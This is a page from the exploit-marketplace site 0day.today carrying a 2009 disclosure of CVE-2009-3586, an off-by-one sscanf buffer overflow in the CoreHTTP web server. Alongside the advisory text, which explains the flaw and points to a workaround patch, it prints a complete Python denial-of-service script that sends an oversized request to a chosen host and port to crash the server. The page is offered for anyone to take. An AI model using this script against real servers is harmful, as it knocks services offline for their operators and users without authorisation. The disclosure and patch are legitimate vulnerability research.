0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CoreHTTP web server off-by-one buffer overflow vulnerability
[============================================================ CoreHTTP web server off-by-one buffer overflow vulnerability ============================================================ # Title: CoreHTTP web server off-by-one buffer overflow vulnerability # CVE-ID: (2009-3586) # OSVDB-ID: () # Author: Patroklos Argyroudis # Published: 2009-12-02 # Verified: yes view source print? # CVE ID: CVE-2009-3586 # Affected Products: CoreHTTP web server versions buffer, # 46: "%" PATHSIZE_S "[A-Za-z] %" PATHSIZE_S "s%*[ \t\n]", req, url); # # The buffers req and url are declared to be of size 256 bytes (PATHSIZE) # and the sscanf() call writes 256 bytes (PATHSIZE_S) to these buffers # without NULL terminating them. # # Note that this is not vulnerability CVE-2007-4060 in which the same # sscanf() call contained no bounds check at all. # # This vulnerability can lead to denial of service attacks against the # CoreHTTP web server and potentially to the remote execution of # arbitrary code with the privileges of the user running the server. We # have developed a proof-of-concept exploit to demonstrate the # vulnerability: # # http://census-labs.com/media/corex.txt # # For the time being, one may use the following workaround to address this # issue, until an official fix is released by the author: # # http://census-labs.com/media/corehttp-0.5.3.1-patch.txt # # -- #!/usr/bin/env python # corex.py -- Patroklos Argyroudis, argp at domain census-labs.com # # Denial of service exploit for CoreHTTP web server version <= 0.5.3.1: # # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3586 # # For a detailed analysis see: # # http://census-labs.com/news/2009/12/02/corehttp-web-server/ import os import sys import socket def main(argv): argc = len(argv) if argc != 3: print "usage: %s " % (argv[0]) sys.exit(0) host = argv[1] port = int(argv[2]) print "[*] target: %s:%d" % (host, port) payload = "A" * 257 + "/index.html HTTP/1.1\r\n\r\n" print "[*] payload: %s" % (payload) sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sd.connect((host, port)) sd.send(payload) sd.close() if __name__ == "__main__": main(sys.argv) sys.exit(0) # 0day.today [2024-07-07] #